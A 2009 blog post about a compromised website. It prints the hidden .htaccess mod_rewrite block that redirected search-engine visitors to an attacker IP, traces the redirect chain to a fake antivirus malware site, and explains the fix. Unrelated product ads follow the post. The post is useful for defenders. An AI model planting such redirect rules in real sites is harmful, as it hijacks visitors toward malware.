Gnarly Malware – Hijacks Website .htaccess and Steals Search Engine Traffic
Posted by Hodge on Jan 14, 2009 in Security, Web Development • 1 comment •
A friend in the US called me a few days ago, asking me to take a look at his website, calypsoislandtours.com, since his site traffic had dropped dramatically, for no obvious reason. Upon further investigation, he discovered that only search engine traffic was affected, which, as with many if not most websites, happened to be a major proportion of his inbound traffic – not particularly good for his business.
I searched Google for his site, and sure enough, clicking on one of the results redirected my browser to a rather dodgy website that clearly wasn’t calypsoislandtours.com. So, I investigated further, and found that somehow, the .htaccess file on his server had been altered, to contain the following lines:
RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC]
RewriteRule .* http://89.28.13.201/in.html?s=xi [R,L]
Which was also preceded by a couple of dozen lines of white space, so that to most users checking .htaccess, the code would be “hidden” below the viewable window of an average text editor (I used the Linux command more, via ssh to check the file).
Basically, this nasty little piece of code utilises mod_rewrite to tell Apache to look for any traffic coming to the server from Google, AOL, MSN, Altavista, Ask or Yahoo (all the big search engines), and then to redirect that traffic to a server with the IP 89.28.13.201 (in a second .htaccess file, the IP was 89.28.13.205).
Using a combination of traceroute and Lynx web browser, I tracked the redirects. The web server located at 89.28.13.201 installs a cookie (visited=1) and also contains a script to redirect to a string of sites – first to worldgreenpeace.cn (link to Google Safe Browsing Info Page), which installs a cookie: soft=1. This site then redirects the browser to the final target destination of bestantivirusfastscan.com (link to Google Safe Browsing Info page) which installs a cookie: av_inst=880147 (arbitrary ID number – although it seems that 880147 people may have been redirected already). This final site contains Malware, which I presume does something nasty, although I felt no inclination to investigate further!
Thankfully, it was easy to cure – I simply deleted the above lines from .htaccess, and the website was instantly be back to normal, receiving the search engine traffic it should.
So, if you’re noticing a massive drop in search engine traffic to your site for no apparent reason, check the .htaccess first!
Something not quite right? Inaccuracies or invalid code? Didn’t work for you? Don’t like me using Ss instead of Zs? Add a comment below! All comments are welcome. Except spam, because spam is a bit crap.
|
|
Seis De Mayo $4.29 It wasn’t long after the recording of this, Trey Anastasio’s third–and most warmly idiosyncratic–solo album, that the Phish frontman/guitarist announced that his improvisation-fueled, cult-fave band would record no more. Longtime Phish-heads (or admirers of Anastasio’s previous free-form jazz excursions with Les Claypool and Stewart Copeland and more conventional solo work) may find this ambitio… |
|
|
Sapphire Video Card 100314-3l Hd 6870 1gb Ddr5 256bit Pci Express D-Dvi/Hdmi/Display Port Retail $222.69 PCI Express based PC is required with one X16 lane graphics slot available on the motherboard.4X75 Watt 6-pin PCI Express power connector is required for CrossFireX system.2X75 Watt 6-pin PCI Express power connector is required.1024MBMinimum of system memory.Installation software requires CD-ROM drive.DVD playback requires DVD drive.Blu-ray/HD DVD playback requires Blu-ray/HD DVD drive.Blu-ray/HD … |
|
|
ASUS Eee Pad Transformer TF101-A1 10.1-Inch Tablet (Dock Sold Separately) $388.99 Tablet Computers, Asus, TF101-A1, TF101-A1… |
|
|
Advanced System CD for Laptop -File Restore, Diagnostics & More for DELL, Compaq, HP, Acer, Lenovo, IBM, Toshiba $15.95 Looking for a disc that actually works, a disc that will boot your laptop and give you access to advanced tools and features when Windows is not booting correctly?The Advanced System Recovery disc has a suite of tools designed to work with any laptop including those from Dell, Compaq, HP, Lenovo, IBM, Acer, Nokia, Toshiba, and more. Simply insert the disc into your computer and restart it to acces… |
|
|
Gateway ID49C07u – Laptop, Intel Core i3 Processor, 14 Display, 4GB Memory, 500GB Hard Drive, Windows 7 Home Premium, Silver $799.99 Digital media card reader Supports Secure Digital, MultiMediaCard, Memory Stick, Memory Stick PRO and xD-Picture Card formats. 4 high-speed USB 2.0 ports For fast digital video, audio and data transfer. Built-in high-speed wireless LAN (802.11b/g/n) Wirelessly connect to the Internet. Built-in 10/100/1000 Gigabit Ethernet LAN With RJ-45 connector for quick and easy wired Web connection. Weighs onl… |
No related posts.
Related posts brought to you by Yet Another Related Posts Plugin.
[...] http://www.64bitjungle.com/web-development/gnarly-malware-hijacks-website-htaccess-and-steals-search…/ [...]